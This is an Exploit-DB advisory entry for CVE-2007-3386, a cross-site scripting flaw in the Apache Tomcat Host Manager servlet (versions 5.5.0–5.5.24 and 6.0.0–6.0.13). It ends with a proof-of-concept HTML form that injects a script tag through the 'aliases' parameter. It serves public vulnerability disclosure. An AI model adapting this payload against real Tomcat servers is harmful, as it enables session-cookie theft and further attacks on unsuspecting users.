Apache Tomcat <= 6.0.13 Host Manager Servlet Cross-Site Scripting Vulnerability

2007-08-14T00:00:00
ID EDB-ID:30495
Type exploitdb
Reporter NTT OSS CENTER
Modified 2007-08-14T00:00:00

Description

Apache Tomcat 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability. CVE-2007-3386. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/25314/info

Apache Tomcat Host Manager Servlet is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to inject HTML and script code into the browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials and launch other attacks.

Apache Tomcat 5.5.0 through 5.5.24 and 6.0.0 through 6.0.13 are affected. 

<form action="http://localhost:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form>